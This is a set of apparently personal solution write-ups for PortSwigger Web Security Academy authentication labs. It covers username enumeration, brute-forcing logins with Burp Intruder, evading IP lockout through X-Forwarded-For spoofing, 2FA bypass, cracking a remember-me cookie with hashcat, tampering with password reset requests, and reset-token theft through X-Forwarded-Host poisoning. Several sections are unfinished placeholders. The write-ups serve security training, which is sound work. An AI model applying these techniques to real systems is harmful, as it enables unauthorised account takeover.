---
title: 'Authentication'
subtitle: 'PortSwigger Web Security Academy Labs'
author: 'Dan Egner'
date: 'PDF generated: \today'

titlepage: true
toc: true
---




# Username enumeration via different responses

<https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-different-responses>

Completed: 2022-11-17


## Summary

The login functionality was vulnerable to brute force attack using common or weak credentials.


## Objective

> This lab is vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:
>
> * [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
> * [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)
>
>> To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page. 


## Solution

1. Intruder cluster bomb attack with provided username and password wordlists
1. Order results by response status code
1. Valid credentials returned status code 302 instead of 200




# Username enumeration via subtly different responses

<https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-subtly-different-responses>

Completed: 2022-11-17


## Summary

Attempting to log in using a valid username with invalid password resulted in a response containing slightly different text compared to invalid usernames' responses. A valid username could be found using a brute force attack comprising many common usernames. Once a valid username was found, the password could be determined using a second brute force attack.


## Objective

> This lab is subtly vulnerable to username enumeration and password brute-force attacks. It has an account with a predictable username and password, which can be found in the following wordlists:
>
> * [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
> * [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)
>
>> To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page. 


## Solution

1. Burp Suite Intruder sniper attack against username field
1. Grep extract results for 'Invalid username or password.'
1. One response contains 'Invalid username or password', missing the '.'
1. Sniper attack against the password field for this username
1. Order results by response status code
1. Valid password returned status code 302 instead of 200




# Username enumeration via response timing

<https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-response-timing>

Completed: 2022-11-17


## Summary

Attempting to log in using a valid username with invalid password resulted in a slower response/longer response time when compared to invalid usernames' responses. A valid username could be found using a brute force attack comprising many common usernames. Once a valid username was found, the password could be determined using a second brute force attack. Simple IP address blocking can be circumvented during each brute force attack by adding an 'X-Forwarded-For' header and providing a different IP address for its value on each attempt.


## Objective

> This lab is vulnerable to username enumeration using its response times.
>
>> To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.
>
> * Your credentials: `wiener:peter`
> * [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
> * [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)


## Solution

1. Burp Suite Repeater: check response times of login POSTs of valid (slow) vs. invalid (fast) usernames
1. IP address blocking is triggered if too many failed attempts occur in a short space of time
1. Circumvent by adding 'X-Forwarded-For: <random-ip-address>'
1. Intruder pitchfork attack: manipulate the 'X-Forwarded-For' IP address and the username. Choose a fixed, random, long password
1. Order results by response time; slowest result is the valid username
1. Second intruder pitchfork attack: manipulate the IP address and the password. Set the username as the one discovered previously
1. Valid password returns status code 302 instead of 200




# Broken brute force protection, IP block

<https://portswigger.net/web-security/authentication/password-based/lab-broken-bruteforce-protection-ip-block>

Completed: 2022-11-17


## Summary

TKTK


## Objective

> This lab is vulnerable due to a logic flaw in its password brute-force protection.
>
>> To solve the lab, brute-force the victim's password, then log in and access their account page.
>
> * Your credentials: `wiener:peter`
> * Victim's username: `carlos`
> * [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)


## Solution

1. Burp repeater shows ~5 incorrect attempts cause 1 min lockout
1. Also shows a correct login resets this
1. Create username list, e.g. using a Vim macro, as so:

    ```
    wiener
    carlos
    wiener
    carlos
    wiener
    carlos
    wiener
    ...
    ```

    ... repeated a few hundred times.

1. Create password list, e.g. using a Vim macro, alternating between the word `peter` and the provided password list:

    ```
    peter
    123456
    peter
    password
    peter
    12345678
    peter
    ...
    ```

1. Run a pitchfork attack using intruder, using the custom username and password lists for the username and password positions respectively

    When run, this attack results in a successful login every other attempt, resetting the failed login counter and preventing the lockout.

1. `carlos`'s valid password returns status code 302 instead of 200




# Username enumeration via account lock

<https://portswigger.net/web-security/authentication/password-based/lab-username-enumeration-via-account-lock>

Completed: 2022-11-17


## Summary

TKTK


## Objective

> This lab is vulnerable to username enumeration. It uses account locking, but this contains a logic flaw.
>
>> To solve the lab, enumerate a valid username, brute-force this user's password, then access their account page.
>
> * [Candidate usernames](https://portswigger.net/web-security/authentication/auth-lab-usernames)
> * [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)


## Solution

1. Intruder cluster bomb: username list, some list of 4 or more passwords
1. Anomalous response length reveals the username got locked, revealing it is valid
1. Repeater against the valid username shows 4 incorrect attempts triggers lockout
1. Intruder sniper against the valid username using the password list
1. Grep match the results for "minute" and for "invalid"
1. The valid password is the response without "minute" and without "invalid"




# Broken brute-force protection, multiple credentials per request

TKTK




# 2FA simple bypass

<https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-simple-bypass>

Completed: 2022-12-01


## Summary

TKTK


## Objective

> This lab's two-factor authentication can be bypassed. You have already obtained a valid username and password, but do not have access to the user's 2FA verification code.
>
>> To solve the lab, access Carlos's account page.
>
> * Your credentials: `wiener:peter`
> * Victim's credentials: `carlos:montoya`

## Solution

1. log in with my creds, using the pretend email client to get the 2FA code
1. note the URL of my account dashboard ends in "/my-account"
1. log out, log in with victim's creds
1. at the 2FA code prompt page, edit the URL to go to the victim's /my-account page




# 2FA broken logic

<https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-broken-logic>

Completed: 2022-12-01


## Summary

TKTK


## Objective

> This lab's two-factor authentication is vulnerable due to its flawed logic.
>
>> To solve the lab, access Carlos's account page.
>
> * Your credentials: `wiener:peter`
> * Victim's username: `carlos`
>
> You also have access to the email server to receive your 2FA verification code.


## Solution

1. log in normally as wiener, recording requests in http history
1. when POSTing the 2FA code (POST /login2 request), "verify" parameter is used to determine which account is being accessed
1. generate a 2FA code for carlos: open GET /login2 request in repeater, change verify to carlos
1. send POST /login2 to intruder, set verify to carlos, brute force "mfs-code" parameter
1. find result with 302 code, open in browser




# 2FA bypass using a brute-force attack

TKTK




# Brute-forcing a stay-logged-in cookie

<https://portswigger.net/web-security/authentication/other-mechanisms/lab-brute-forcing-a-stay-logged-in-cookie>

Completed: 2022-12-01


## Summary

TKTK


## Objective

> This lab allows users to stay logged in even after they close their browser session. The cookie used to provide this functionality is vulnerable to brute-forcing.
>
>> To solve the lab, brute-force Carlos's cookie to gain access to his "My account" page.
>
> * Your credentials: `wiener:peter`
> * Victim's username: `carlos`
> * [Candidate passwords](https://portswigger.net/web-security/authentication/auth-lab-passwords)


## Solution

1. Logging in and out using `wiener:peter`, both with and without the `Stay logged in` button ticked shows that a `stay-logged-in` cookie is set when the button is ticked in the login POST. The value does not change after logging out and back in; it is always:

    ```
	stay-logged-in=d2llbmVyOjUxZGMzMGRkYzQ3M2Q0M2E2MDExZTllYmJhNmNhNzcw
    ```

	This value is base64 encoded, the clear text being:

    ```
	wiener:51dc30ddc473d43a6011e9ebba6ca770
    ```

	The second part is an MD5 hash.

1. Crack the MD5 hash using hashcat.

    ```sh
	hashcat -m0 -a0 -O --status 51dc30ddc473d43a6011e9ebba6ca770 .\tools\hash-cracking\wordlists\rockyou.txt
    ```

	Cracked hash: `51dc30ddc473d43a6011e9ebba6ca770:peter`

1. The value of the `stay-logged-in` cookie is therefore `base64(<username>:MD5(<password>))`
1. Use Burp Intruder to brute-force the value of carlos' stay-logged-in cookie
	1. Log in with `wiener:peter` and `Stay logged in` ticked
	1. Log out
	1. Send this GET request to Burp Intruder
	1. Sniper attack against the `stay-logged-in` cookie value
	1. Payload set: the candidate passwords list
	1. Payload processing rules: `Hash: MD5`, `Add Prefix: carlos:`, `Base64-encode`
	1. Grep match: `Update email` (this only appears when successfully logged in)
	1. The successful cookie value was:
    
        `Y2FybG9zOjgxZGM5YmRiNTJkMDRkYzIwMDM2ZGJkODMxM2VkMDU1`

1. This logs you in as user `carlos`




# Offline password cracking

TKTK




# Password reset broken logic

<https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-broken-logic>

Completed: 2022-12-01


## Summary

TKTK


## Objective

> This lab's password reset functionality is vulnerable. To solve the lab, reset Carlos's password then log in and access his "My account" page.
>
> * Your credentials: `wiener:peter`
> * Victim's username: `carlos`


## Solution

1. Click `My Account` > `Forgot password?`
1. Submit `wiener` in the username field
1. Visit the email client, click the password reset link
1. Enter a new password and confirmation password, catch the request in Burp
1. In the POST request, change value of `username` parameter from `wiener` to `carlos`

    Original:

    ```
	temp-forgot-password-token=5JTRYXEBTCw3JA4fQMlVlllsOxZjIa8H&username=wiener&new-password-1=test&new-password-2=test
    ```

	Edited:

    ```
	temp-forgot-password-token=5JTRYXEBTCw3JA4fQMlVlllsOxZjIa8H&username=carlos&new-password-1=test&new-password-2=test
    ```

1. Forward the edited request
1. Log in as `carlos` with the new password set during the password reset




# Password reset poisoning via middleware

<https://portswigger.net/web-security/authentication/other-mechanisms/lab-password-reset-poisoning-via-middleware>

Completed: 2022-12-01


## Summary

TKTK


## Objective

> This lab is vulnerable to password reset poisoning. The user `carlos` will carelessly click on any links in emails that he receives.
>
>> To solve the lab, log in to Carlos's account.
>
> You can log in to your own account using the following credentials: `wiener:peter`. Any emails sent to this account can be read via the email client on the exploit server.


## Solution

1. Go through the password reset functionality as `wiener`. An email is sent to our address containing a password reset URL. This contains a temp-forgot-password-token token:

    ```
	https://0a7900b3035fed67c0895eda007f002f.web-security-academy.net/forgot-password?temp-forgot-password-token=dQ1mzhufy6M1YnkUKG6z5x6Y01CcIQ31
    ```

1. The initial POST request that starts the password reset process accepts the `X-Forwarded-Host` header
1. Send this POST request to Burp Repeater
1. Add `X-Forwarded-Host: <exploit-server-url>` to the request and change `username` value to `carlos`
1. Send
1. In the exploit server's access logs, see the `GET /forgot-password` entry:

    ```
	10.0.3.237      2022-12-01 15:09:05 +0000 "GET /forgot-password?temp-forgot-password-token=AzI4aU2NIIfJjToW5buHRQcLPyVwp2Mf HTTP/1.1" 404 "User-Agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.121 Safari/537.36"
    ```

	This contains user `carlos`'s forgotten password token:
    
    `AzI4aU2NIIfJjToW5buHRQcLPyVwp2Mf`

1. Visit the password reset URL we were emailed earlier, replacing the token value with the stolen value from `carlos`
1. Set a new password (for user `carlos`) and log in




# Password brute-force via password change

TKTK

